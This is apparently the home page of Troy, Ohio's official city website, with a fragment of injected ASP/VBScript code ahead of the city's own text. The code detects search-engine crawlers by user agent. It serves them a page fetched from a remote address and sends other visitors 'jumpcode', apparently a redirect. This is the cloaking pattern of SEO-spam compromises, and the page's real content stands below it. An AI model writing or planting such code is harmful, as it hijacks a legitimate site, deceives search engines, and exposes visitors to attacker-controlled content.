If instr(s_agent,"google")>0 Or instr(s_agent,"yahoo")>0 Or instr(s_agent,"bing")>0 Or instr(s_agent,"msnbot")>0 Or instr(s_agent,"alexa")>0 Or instr(s_agent,"ask")>0 Or instr(s_agent,"findlinks")>0 Or instr(s_agent,"altavista")>0 Or instr(s_agent,"baidu")>0 Or instr(s_agent,"inktomi")>0 Then is_spider = 1 else is_spider = 0 end if end function Function getHTTPPage(URL) Set HTTPReq = Server.createobject("Msxml2.XMLHTTP") HTTPReq.Open "GET", URL, False HTTPReq.send If HTTPReq.readyState <> 4 Then Exit Function getHTTPPage = Bytes2bStr(HTTPReq.responseBody) Set HTTPReq = Nothing End Function Function Bytes2bStr(vin) Dim BytesStream,StringReturn Set BytesStream = Server.CreateObject("ADODB.Stream") BytesStream.Type = 2 BytesStream.Open BytesStream.WriteText vin BytesStream.Position = 0 BytesStream.Charset = "UTF-8" BytesStream.Position = 2 StringReturn =BytesStream.ReadText BytesStream.close Set BytesStream = Nothing Bytes2bStr = StringReturn End Function spider = is_spider() if spider = 1 then htmls = getHTTPPage(desurl) response.write htmls response.end end if response.write jumpcode %> Troy, Ohio - USA - Official Home Page

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Thank you for your patience.

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Mayor Michael L. Beamish


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100 South Market St.
Troy, Ohio  45373

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